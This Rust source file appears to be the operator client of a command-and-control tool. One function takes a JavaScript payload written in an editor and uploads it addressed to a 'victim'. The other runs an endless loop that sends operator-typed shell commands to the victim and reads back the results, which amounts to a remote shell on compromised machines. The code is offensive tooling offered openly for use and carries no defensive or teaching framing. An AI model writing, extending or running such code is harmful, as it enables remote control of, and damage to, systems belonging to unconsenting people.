1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
use std::env::var;
use std::io::Write;
use std::process::Command;
use libathena::payload::attack::PayloadBuilder;
use tempfile::tempdir;
use tokio::fs;
use crate::{errors::*, State};
pub async fn javascript<W: Write>(s: &mut State<W>) -> CliResult<()> {
const FILE_NAME: &str = "payload.js";
let editor = if s.editor.is_some() {
s.editor.clone().unwrap()
} else {
var("EDITOR").map_err(|_| {
CliErrors::EnvVarError(EnvVarError {
var: "EDITOR".into(),
preference: "editor".into(),
})
})?
};
let dir = tempdir()?;
let file_path = dir.path().join(FILE_NAME);
let mut editor_program = Command::new(&editor)
.arg(&file_path)
.spawn()
.unwrap_or_else(|_| panic!("Unable to launch editor {}", &editor));
editor_program.wait()?;
let payload_content = fs::read_to_string(&file_path).await?;
let mut payload = PayloadBuilder::default()
.victim("".into())
.payload_type("JAVASCRIPT".into())
.payload(payload_content.trim().to_owned())
.password(s.client.get_password().to_owned())
.build()
.unwrap();
s.upload_payload(&mut payload).await?;
Ok(())
}
pub async fn shell<W: Write>(s: &mut State<W>, input: &mut String) -> CliResult<()> {
let mut payload = PayloadBuilder::default()
.victim("".into())
.payload_type("SHELL".into())
.payload("".into())
.password(s.client.get_password().to_owned())
.build()
.unwrap();
loop {
s.mode.clone().print_and_read(s, input)?;
payload.payload = input.trim().to_string();
s.upload_payload(&mut payload).await?;
s.read_responses().await?;
}
Ok(())
}